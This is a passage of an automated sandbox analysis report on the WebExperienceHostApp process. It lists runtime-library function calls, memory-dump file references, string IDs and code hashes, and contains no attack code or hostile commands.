                                                                    • iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002BBC62), ref: 00007FFE002BC64F
                                                                    • iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002BBC62), ref: 00007FFE002BC6B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: iswspace$iswxdigit
                                                                    • String ID: (
                                                                    • API String ID: 3812816871-3887548279
                                                                    • Opcode ID: af74e7a852e4c75f6a718f3a8d1f3b3ec46cce7310ff1cc0720302810e8eb93a
                                                                    • Instruction ID: 3c9b9466d158dc29499bd67306ba25e0f5c68b2c5d258a155a62b44e59a5fdc5
                                                                    • Opcode Fuzzy Hash: af74e7a852e4c75f6a718f3a8d1f3b3ec46cce7310ff1cc0720302810e8eb93a
                                                                    • Instruction Fuzzy Hash: DF519466D0815381EB149F61D5102B9BAEDEFA0F85FA88032DB49062EEEF7DE841D750
                                                                    APIs
                                                                    • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002B9BB2), ref: 00007FFE002BA78A
                                                                    • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002B9BB2), ref: 00007FFE002BA79B
                                                                    • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002B9BB2), ref: 00007FFE002BA7F4
                                                                    • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002B9BB2), ref: 00007FFE002BA8A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: isspace$isalnumisxdigit
                                                                    • String ID: (
                                                                    • API String ID: 3355161242-3887548279
                                                                    • Opcode ID: e4c8b5f9a1eedea8ab66487062a0c964c7a231e5b0b0ae06890dc159a5d96cfd
                                                                    • Instruction ID: 0765e411391c2a0830b180e527d58a79cb2857fed4ccb037acb73d1ca193f4f2
                                                                    • Opcode Fuzzy Hash: e4c8b5f9a1eedea8ab66487062a0c964c7a231e5b0b0ae06890dc159a5d96cfd
                                                                    • Instruction Fuzzy Hash: 6841D957D0C58315FB218F30A5543F97FAA9F61B84F189031CB9807BABEE2DE8069712
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: FileHeader
                                                                    • String ID: MOC$RCC$csm$csm
                                                                    • API String ID: 104395404-1441736206
                                                                    • Opcode ID: e47b9c62b142ec837dc56d6eeb4aaf33c41ea22ad6153d04f5b8a65e6047be76
                                                                    • Instruction ID: 32fd6b201503fe258755e17bfef0ae4f3faf8188029de6a6ba890b4df8d88a72
                                                                    • Opcode Fuzzy Hash: e47b9c62b142ec837dc56d6eeb4aaf33c41ea22ad6153d04f5b8a65e6047be76
                                                                    • Instruction Fuzzy Hash: 2A517F72E0DA05CEFB609B26904137D67A0FFA4BA4F145171EE5D623A9CF3CE4818B09
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                    • String ID: `S(
                                                                    • API String ID: 1775671525-330675295
                                                                    • Opcode ID: 7371046f5cd766d1bffe046c2d59978eee7b4bc23b1b826026726add19b89a48
                                                                    • Instruction ID: 95f9d091e9a9b5e19084b22bf7675086941505c84e7322c6db6180144fb394b1
                                                                    • Opcode Fuzzy Hash: 7371046f5cd766d1bffe046c2d59978eee7b4bc23b1b826026726add19b89a48
                                                                    • Instruction Fuzzy Hash: 82312325B0A64285EA04DB52E54423DA795EF84BE4F588632DF6D07BFEEF7CE0818300
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFE0029AA1C), ref: 00007FFE002A4539
                                                                      • Part of subcall function 00007FFE0028B610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002B1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE0028B63B
                                                                      • Part of subcall function 00007FFE0028B610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE002B1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE0028B657
                                                                    • _Getvals.LIBCPMT ref: 00007FFE002A4575
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Getvals___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
                                                                    • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                    • API String ID: 3848194746-3573081731
                                                                    • Opcode ID: 2a1dead84669e62d4c6aa20b34b7046138b1e70ef67a0d10036ed14bfbe73e3f
                                                                    • Instruction ID: 9df9823b1d0d02a65d5f78320ff968ae1ed4dbfcd4fe4b8fbe106b925b6a4a9b
                                                                    • Opcode Fuzzy Hash: 2a1dead84669e62d4c6aa20b34b7046138b1e70ef67a0d10036ed14bfbe73e3f
                                                                    • Instruction Fuzzy Hash: 8B41DF32E08B828BE724DF25918006D7BA0FBD6B817544235DB8943F26DF78E565CB00
                                                                    APIs
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE002A47FA
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE002A4873
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE002A4889
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
                                                                    • String ID: false$true
                                                                    • API String ID: 309754672-2658103896
                                                                    • Opcode ID: b86e9ff55447f8bb7dd7b80b7493685c570f732746a915be5b888df3f4acdba4
                                                                    • Instruction ID: 1a318ec257b9d2cd82445ab3eec6f03a0d3212613206c95111e20b093175d45f
                                                                    • Opcode Fuzzy Hash: b86e9ff55447f8bb7dd7b80b7493685c570f732746a915be5b888df3f4acdba4
                                                                    • Instruction Fuzzy Hash: 15417C22B18B5699E710DF70E4401ED37B4FB98748B405126EF8E27B6AEF38D595C384
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-1866435925
                                                                    • Opcode ID: a2b70420098d26693de4527d37465282da3bca17158f06936729b8f78c388bff
                                                                    • Instruction ID: 39227150d574bfaf4146bbe6d3347a2d6bb8fe51c4b502ebb25aea1bd2ab1193
                                                                    • Opcode Fuzzy Hash: a2b70420098d26693de4527d37465282da3bca17158f06936729b8f78c388bff
                                                                    • Instruction Fuzzy Hash: C4F0AD66A1A50796EA58D740D8456F92B61FBC0308FE44436D78E067BFEF3CEA46C740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: fgetwc
                                                                    • String ID:
                                                                    • API String ID: 2948136663-0
                                                                    • Opcode ID: 5d0bd3b3671dd2de51b020413378f813fd9af0de5620b63b9d479feaafa28656
                                                                    • Instruction ID: cb18f75bf9c340050f55a91f5bb890df5fcee7d0e7a2d6e0cf4737dd7d5ac3a4
                                                                    • Opcode Fuzzy Hash: 5d0bd3b3671dd2de51b020413378f813fd9af0de5620b63b9d479feaafa28656
                                                                    • Instruction Fuzzy Hash: 0B814972B05E5289EB618F25D0803AC37A1FB88B98F945532EB4D47BAEDF79D494C300
                                                                    APIs
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B84B
                                                                    • memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B859
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B892
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B89C
                                                                    • memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B8AA
                                                                      • Part of subcall function 00007FFE002D2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285AA8), ref: 00007FFE002D2B36
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$_invalid_parameter_noinfo_noreturnmalloc
                                                                    • String ID:
                                                                    • API String ID: 3375828981-0
                                                                    • Opcode ID: 6f4a34c3589a7d23e4e271cc679256edd1debc67f1c1ab71833d9f73d2c9430a
                                                                    • Instruction ID: 79663e95f38e4c63ed46315dc5780346ced094c1bb35f58a2822e31d99418e41
                                                                    • Opcode Fuzzy Hash: 6f4a34c3589a7d23e4e271cc679256edd1debc67f1c1ab71833d9f73d2c9430a
                                                                    • Instruction Fuzzy Hash: C731F329B0968380EE05DA92A50836DAB55FB84BD0F488536DF5D0BBAFCF7CE4818300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: NameName::$Name::operator+
                                                                    • String ID:
                                                                    • API String ID: 826178784-0
                                                                    • Opcode ID: 58c7f08e817265fdc996fa836f6f1a6d952153b3f959fa2b3b32e8b1553b858e
                                                                    • Instruction ID: 9fff19e077b402753cf3101e8658c8c42aebf9223e11fe03ef082f10706177dc
                                                                    • Opcode Fuzzy Hash: 58c7f08e817265fdc996fa836f6f1a6d952153b3f959fa2b3b32e8b1553b858e
                                                                    • Instruction Fuzzy Hash: 1D415D32A48E56C9E710CB62D8401FC77A4BB29BA0B9444B6DA7D633B5DF38E515D304
                                                                    APIs
                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00007D77593F6882,00007FF60BD75077,?,?,00000000,00007FF60BD732B7,?,?,?,00007FF60BD73297,?,?,00000000,00007FF60BD75D42), ref: 00007FF60BD75CA2
                                                                    • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00007D77593F6882,00007FF60BD75077,?,?,00000000,00007FF60BD732B7,?,?,?,00007FF60BD73297,?,?,00000000,00007FF60BD75D42), ref: 00007FF60BD75CAE
                                                                    • memset.VCRUNTIME140_APP(?,?,00007D77593F6882,00007FF60BD75077,?,?,00000000,00007FF60BD732B7,?,?,?,00007FF60BD73297,?,?,00000000,00007FF60BD75D42), ref: 00007FF60BD75CE7
                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00007D77593F6882,00007FF60BD75077,?,?,00000000,00007FF60BD732B7,?,?,?,00007FF60BD73297,?,?,00000000,00007FF60BD75D42), ref: 00007FF60BD75CF6
                                                                    • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00007D77593F6882,00007FF60BD75077,?,?,00000000,00007FF60BD732B7,?,?,?,00007FF60BD73297,?,?,00000000,00007FF60BD75D42), ref: 00007FF60BD75D02
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$memset
                                                                    • String ID:
                                                                    • API String ID: 577239450-0
                                                                    • Opcode ID: 9367a4d55e890f3ae2d68fb533305932e09a24cd37a727d6c0f3e9578350c234
                                                                    • Instruction ID: 32a3b9f89bef78d5b529321e935349e9bf96ba472c28dd106162ba41d326c4c4
                                                                    • Opcode Fuzzy Hash: 9367a4d55e890f3ae2d68fb533305932e09a24cd37a727d6c0f3e9578350c234
                                                                    • Instruction Fuzzy Hash: 76019214E8D65281FA181B52B40C3B9D250EF6CBC4F28C234D90BC77E5EEAE98514302
                                                                    APIs
                                                                      • Part of subcall function 00007FFE00292170: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FFE00284BFE,?,?,00000000,00007FFE00285B0B), ref: 00007FFE0029217F
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285B0B), ref: 00007FFE00284C07
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285B0B), ref: 00007FFE00284C1B
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285B0B), ref: 00007FFE00284C2F
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285B0B), ref: 00007FFE00284C43
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285B0B), ref: 00007FFE00284C57
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285B0B), ref: 00007FFE00284C6B
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$setlocale
                                                                    • String ID:
                                                                    • API String ID: 294139027-0
                                                                    • Opcode ID: ec2947436e03ee684cb70bb826a4a9021d29c8d7d003c080e4c03139d84977b6
                                                                    • Instruction ID: f093a512afa2d4ee2ed02b9ee927d7684a66bcbdcef9ee32f51b8196efb62c9b
                                                                    • Opcode Fuzzy Hash: ec2947436e03ee684cb70bb826a4a9021d29c8d7d003c080e4c03139d84977b6
                                                                    • Instruction Fuzzy Hash: 89110316607A1782EF59DFA1C0A53396764EFC4F88F180576C70E0926ECFADE894D380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: 1408db0c91c4afda7cd62dbc657a8b28289742c7a241f7735ef7cac3faab0118
                                                                    • Instruction ID: 381d054bc18558abd112d01dc2eb5c43c5714c02624fb5f21401895893e545f2
                                                                    • Opcode Fuzzy Hash: 1408db0c91c4afda7cd62dbc657a8b28289742c7a241f7735ef7cac3faab0118
                                                                    • Instruction Fuzzy Hash: 7DF0EC25619F1392DB449B15F99416867B4FBC8BD0F544032DB8D43B7ADFACE8A58300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: 78515aec29c92e18f2c63f3efd2ffdad150a398ddd245488889049c7a56c38d1
                                                                    • Instruction ID: 1888cd221fc5c7c603dcddb5963ff3044589091e5ac0d3003f2d0f9ba88c43bb
                                                                    • Opcode Fuzzy Hash: 78515aec29c92e18f2c63f3efd2ffdad150a398ddd245488889049c7a56c38d1
                                                                    • Instruction Fuzzy Hash: F4F0EC21618F5392DB449B15E99416867B0FBC8FD0F544032DB8D43B7ADFACE8A98700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: __acrt_iob_func$abortfputcfputs
                                                                    • String ID:
                                                                    • API String ID: 2697642930-0
                                                                    • Opcode ID: aee1c2c9c76fa389c21114d33f76dd71eb7fbf57215ad3c44bcd325c68c615ae
                                                                    • Instruction ID: 66bab3fabf3e00bf4a7596578c5a0c59661828cfbd983d430bd3534c04f9a3b7
                                                                    • Opcode Fuzzy Hash: aee1c2c9c76fa389c21114d33f76dd71eb7fbf57215ad3c44bcd325c68c615ae
                                                                    • Instruction Fuzzy Hash: F8E0E6A4A15D1343E7055B61FC183356A56AF88B42F540039CB5F4637ADD6C59444611
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Strftime_errno_invalid_parameter_noinfo_noreturnmemset
                                                                    • String ID: !%x
                                                                    • API String ID: 3810971073-1893981228
                                                                    • Opcode ID: ace867cac6d922fdf45cf98f8f1924e58bc32f1dff1343da71478c459ec0add8
                                                                    • Instruction ID: 3ee598bfe0a378c398c49474b055f731b4bb5a5d79b80ea57551a83182f80e0b
                                                                    • Opcode Fuzzy Hash: ace867cac6d922fdf45cf98f8f1924e58bc32f1dff1343da71478c459ec0add8
                                                                    • Instruction Fuzzy Hash: 87818B22B08A8689FB05CF65E8543BC2BA5EB88B88F544531DF5D17BAEDF7CD5818340
